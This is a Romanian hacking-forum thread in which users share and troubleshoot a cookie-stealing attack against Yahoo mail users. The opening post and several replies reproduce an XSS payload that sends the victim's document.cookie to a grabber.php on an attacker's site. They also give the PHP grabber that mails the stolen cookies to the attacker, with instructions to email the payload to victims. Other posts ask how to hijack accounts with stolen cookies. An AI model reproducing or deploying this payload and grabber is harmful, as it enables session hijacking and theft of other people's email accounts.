Y2K`
Elite Member
Din: 666
Inregistrat: acum 18 ani
Postari: 970
|
|
Cred ca nu mai este nevoie de multe explicatii. Trimiteti cookie script in mailul victimei si aceasta va trebui sa dea un click pe linkul (sau eventual poza pe care vreti sa o bagati linkata) ce duce catre cookie grabber. Nu uitati sa schimbati path catre cookie grabber (php) si adresa de mail din cookie script. Functioneaza pe IE si pe Yahoo Beta. Succes la furat mailuri.
Cookie script
<div id=yiv1052512133><a target="_blank" rel="nofollow" _ href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=classified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0"><script>location.href='http://www.site.com/grabber.php?email=hackeru_dani @ yahoo.com&cookie='+escape(document.cookie)</script>" > Vezi ca mi-am urcat pozele de la disco aici</a></div> | (vezi ca nu e spatiu intr @ )
Php grabber script:
<?php ## Cookie ## $myemail = $_GET['email']; $cookie = $_GET['cookie']; $today = date("l, F j, Y, g:i a" ; $subject = "Master you have an sucker" ; $message = "undeva-Crewn http://www.undeva-crew.net nnDate: $today nnCookie: n$cookie nundeva-Crewn http://www.undeva-crew.net"; $from = "From: Nemessis<nemessis@undeva-crew.net>rn"; mail($myemail, $subject, $message, $from); echo "<meta http-equiv='refresh' content='1;url=http://www.undeva-crew.net'>"; ?> |
MODIFICATI MAILUL DIN COOKIE SCRIPT (este trecut ca in exemplul meu de mai sus). URCATI PE PAGINA VOASTRA PHP-UL CARE TRIMITE COOKIES FURATE LA VOI IN MAIL . MODIFICATI IN LINKUL DE LA COOKIES EXPLOIT PATH-UL CATRE SITE-UL VOSTRU PE CARE SE AFLA PHP GRABBER (este trecut ca in exemplul meu de mai sus).
Credit pentru linkul cu vulnerabilitatea XSS http://realestate.yahoo.com/New_York/Sc ... oomLow=1.0 - DarkProfits (ICQ 50505068) Adaugiri, modificari si filter bypassing pentru a functiona cookie stealer - made by Nemessis
Modificat de Y2K` (acum 18 ani)
|
|
pus acum 18 ani |
|
cyber
Elite Member
Din: www.kellot.lx.ro
Inregistrat: acum 18 ani
Postari: 528
|
|
...tare atunci...dar in index.html cum fac ca sa imi deschida grabber.php? si cookie scriptul sub forma de ce il trimit prin email? cum il trimit?
_______________________________________ ..::Nu am mai trecut de mult pe aici::..
..::[][]::..
|
|
pus acum 18 ani |
|
Hooligan
Old School Member
Din: Zion
Inregistrat: acum 18 ani
Postari: 461
|
|
pai cookie iti vine pe mailul care il treci tu in cookie script si grabber.php il urci pe un site , vezi si tu cum numesti cookie scriptul sa fie ceva cat mai convingator . Bafta la furat cookie
_______________________________________ Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
pus acum 18 ani |
|
aL3Cs
Master of 127.0.0.1
Inregistrat: acum 18 ani
Postari: 139
|
|
si hostu carei il pui tre sa aiba functia mail() nu?
_______________________________________ Hacked By [aL3Cs]
|
|
pus acum 18 ani |
|
Y2K`
Elite Member
Din: 666
Inregistrat: acum 18 ani
Postari: 970
|
|
aL3Cs a scris:
si hostu carei il pui tre sa aiba functia mail() nu? |
exact
|
|
pus acum 18 ani |
|
cyber
Elite Member
Din: www.kellot.lx.ro
Inregistrat: acum 18 ani
Postari: 528
|
|
@hoo...nu ai inteles ce vroiam sa iti zic...am intrebat ca unde scriu cookie scriptul ala? in mailul pe care il trimit la victima? sau pun cookie scriptul pe un host?
_______________________________________ ..::Nu am mai trecut de mult pe aici::..
..::[][]::..
|
|
pus acum 18 ani |
|
Hooligan
Old School Member
Din: Zion
Inregistrat: acum 18 ani
Postari: 461
|
|
deci cookie script il trimiti la victima si grabber.php il pui pe situl tau
_______________________________________ Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
pus acum 18 ani |
|
cyber
Elite Member
Din: www.kellot.lx.ro
Inregistrat: acum 18 ani
Postari: 528
|
|
ok ok...am luat niste cookies de pe dc++...sunt de la siteurile piczo....am deschis unul din ele ( [1].txt) si imi arata asta:
he llo pic3.piczo.com/ 1088 2967927168 29812192 466286768 29812092 * intre numere si cuvinte erau patratele...acum intrebarea...cum fac sa intru pe siteul lui de pe piczo cu ajutorul la cookie-ul pe care lam luat? siteul e: pe care lam luat din alt cookie:
jkpopup yes 1088 1006230272 29812293 300346768 29812092 * br17777 0 1088 1056230272 29812293 345706768 29812092 * pr17777 2 1088 1709484928 29817132 345806768 29812092 * he llo 1088 2907927168 29812192 407496768 29812092 *
_______________________________________ ..::Nu am mai trecut de mult pe aici::..
..::[][]::..
|
|
pus acum 18 ani |
|
hfhun
Elite Member
Inregistrat: acum 18 ani
Postari: 593
|
|
|
pus acum 18 ani |
|
Hooligan
Old School Member
Din: Zion
Inregistrat: acum 18 ani
Postari: 461
|
|
cred ca ala e cookieul de la site si iti treb precum in tutorialul lui imperfect un alt cod dala gen cookie ca sa reusesti sa te loghezi iti treb un cookie editor care il gasesti pe dar incerca sa bagi cookiurile pe care le-ai gasit desi nu cred ca merge
_______________________________________ Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
pus acum 18 ani |
|
Yo
Junior+
Inregistrat: acum 18 ani
Postari: 43
|
|
misto Y2K`, acuma sa vad daca inteleg si sa vad ce reusesc
hoo imi dai si mie imaginea de la semnatura ta
Modificat de Yo (acum 18 ani)
|
|
pus acum 18 ani |
|
Y2K`
Elite Member
Din: 666
Inregistrat: acum 18 ani
Postari: 970
|
|
eu a scris:
misto Y2K`, acuma sa vad daca inteleg si sa vad ce reusesc
hoo imi dai si mie imaginea de la semnatura ta |
offtopic: esti fan TNA ?
ontopic : nu stiu daca o mai am ma uit prin pc sa vad
hack
Modificat de Y2K` (acum 18 ani)
|
|
pus acum 18 ani |
|
Y2K`
Elite Member
Din: 666
Inregistrat: acum 18 ani
Postari: 970
|
|
deci cum pot face sa trimit cu yahoo codu ?
Code:
<div id=yiv1052512133><a target="_blank" rel="nofollow" _ href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=classified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0"><script>location.href='http://www.site.com/grabber.php?email=hackeru_dani @ yahoo.com&cookie='+escape(document.cookie)</script>" >
Vezi ca mi-am urcat pozele de la disco aici</a></div> |
|
|
pus acum 18 ani |
|
Shocker
Super Moderator
Din: localhost
Inregistrat: acum 18 ani
Postari: 2084
|
|
Y2K` a scris:
deci cum pot face sa trimit cu yahoo codu ?
Code:
<div id=yiv1052512133><a target="_blank" rel="nofollow" _ href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=classified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0"><script>location.href='http://www.site.com/grabber.php?email=hackeru_dani @ yahoo.com&cookie='+escape(document.cookie)</script>" >
Vezi ca mi-am urcat pozele de la disco aici</a></div> |
|
Pai stai ca sunt confuz... tu ai pus tutorialul si nici nu l-ai citit de nu stii cum se face? Interesant ...
_______________________________________ ShockingSoft is back Freakz only Comics of the day
|
|
pus acum 18 ani |
|
ThiefUnU
Elite Member
Inregistrat: acum 18 ani
Postari: 578
|
|
interesant !!
_______________________________________ Layout challange : NU DA CLICK !!
|
|
pus acum 18 ani |
|
cyber
Elite Member
Din: www.kellot.lx.ro
Inregistrat: acum 18 ani
Postari: 528
|
|
serios mai, cum se trimite cookie scriptul prin mail?
_______________________________________ ..::Nu am mai trecut de mult pe aici::..
..::[][]::..
|
|
pus acum 18 ani |
|
cyber
Elite Member
Din: www.kellot.lx.ro
Inregistrat: acum 18 ani
Postari: 528
|
|
cum mai vine si aia?
_______________________________________ ..::Nu am mai trecut de mult pe aici::..
..::[][]::..
|
|
pus acum 18 ani |
|
Y2K`
Elite Member
Din: 666
Inregistrat: acum 18 ani
Postari: 970
|
|
|
pus acum 18 ani |
|
cyber
Elite Member
Din: www.kellot.lx.ro
Inregistrat: acum 18 ani
Postari: 528
|
|
ok. tnks
_______________________________________ ..::Nu am mai trecut de mult pe aici::..
..::[][]::..
|
|
pus acum 18 ani |
|
Hooligan
Old School Member
Din: Zion
Inregistrat: acum 18 ani
Postari: 461
|
|
faza merge 100% ca am incercat si eu pe mine si a mers dar iti vine mailul mai greu sau cel putin asa a venit la mine
_______________________________________ Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
pus acum 18 ani |
|
weaver
Grand Master
Inregistrat: acum 17 ani
Postari: 208
|
|
dcz ca intreb dar eu tot n-am priceput ! Cum trimiti Cookie scriptul ? Il trimiti asa text cum ii prin mail sau il salvezi intr-ul fisier html si-l trimiti prin mail. pls va rog sa raspunda careva.
_______________________________________ Catre :Google
|
|
pus acum 17 ani |
|
Hooligan
Old School Member
Din: Zion
Inregistrat: acum 18 ani
Postari: 461
|
|
weaver a scris:
dcz ca intreb dar eu tot n-am priceput ! Cum trimiti Cookie scriptul ? Il trimiti asa text cum ii prin mail sau il salvezi intr-ul fisier html si-l trimiti prin mail. pls va rog sa raspunda careva.
|
treb sa salvezi primul script intr-un format .html si il trimiti pe mailul care vrei sa furi cookiul
_______________________________________ Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!
|
|
pus acum 17 ani |
|
weaver
Grand Master
Inregistrat: acum 17 ani
Postari: 208
|
|
aham m s
_______________________________________ Catre :Google
|
|
pus acum 17 ani |
|
cena_n90
Junior+
Din: Bucuresti
Inregistrat: acum 17 ani
Postari: 37
|
|
Cine posteaza si un tutorial video?
_______________________________________
Hacking 127.0.0.1
|
|
pus acum 17 ani |
|
TheBes7
user
Din: Camera Mea !
Inregistrat: acum 17 ani
Postari: 896
|
|
Y2K` a scris:
Cookie script
<div id=yiv1052512133><a target="_blank" rel="nofollow" _ href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=classified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0"><script>location.href='http://www.site.com/grabber.php?email=emailu meu @ yahoo.com&cookie='+escape(document.cookie)</script>" > Vezi ca mi-am urcat pozele de la disco aici</a></div> | (vezi ca nu e spatiu intr @ )
Php grabber script:
<?php ## Cookie ## $myemail = $_GET['email']; $cookie = $_GET['cookie']; $today = date("l, F j, Y, g:i a" ; $subject = "Master you have an sucker" ; $message = "undeva-Crewn http://www.undeva-crew.net nnDate: $today nnCookie: n$cookie nundeva-Crewn"; $from = "From: No COmment<blabla @ yahoo.com>rn"; mail($myemail, $subject, $message, $from); echo "<meta http-equiv='refresh' content='1;url=http://www.undeva-crew.net'>"; ?> |
MODIFICATI MAILUL DIN COOKIE SCRIPT (este trecut ca in exemplul meu de mai sus). URCATI PE PAGINA VOASTRA PHP-UL CARE TRIMITE COOKIES FURATE LA VOI IN MAIL . MODIFICATI IN LINKUL DE LA COOKIES EXPLOIT PATH-UL CATRE SITE-UL VOSTRU PE CARE SE AFLA PHP GRABBER (este trecut ca in exemplul meu de mai sus).
Credit pentru linkul cu vulnerabilitatea XSS http://realestate.yahoo.com/New_York/Sc ... oomLow=1.0 - DarkProfits (ICQ 50505068) Adaugiri, modificari si filter bypassing pentru a functiona cookie stealer - made by Nemessis |
cam asha ar trebui ca nici eu nu am inteles prea bine
Modificat de No Comment (acum 17 ani)
_______________________________________ PinkMedia-Comunity Star
|
|
pus acum 17 ani |
|
cena_n90
Junior+
Din: Bucuresti
Inregistrat: acum 17 ani
Postari: 37
|
|
uite ca ma sustzine si pe mn cnva
_______________________________________
Hacking 127.0.0.1
|
|
pus acum 17 ani |
|
blood
Junior
Inregistrat: acum 18 ani
Postari: 25
|
|
am facut cum ati spus mai sus dar nu am primit niciun mail...
|
|
pus acum 17 ani |
|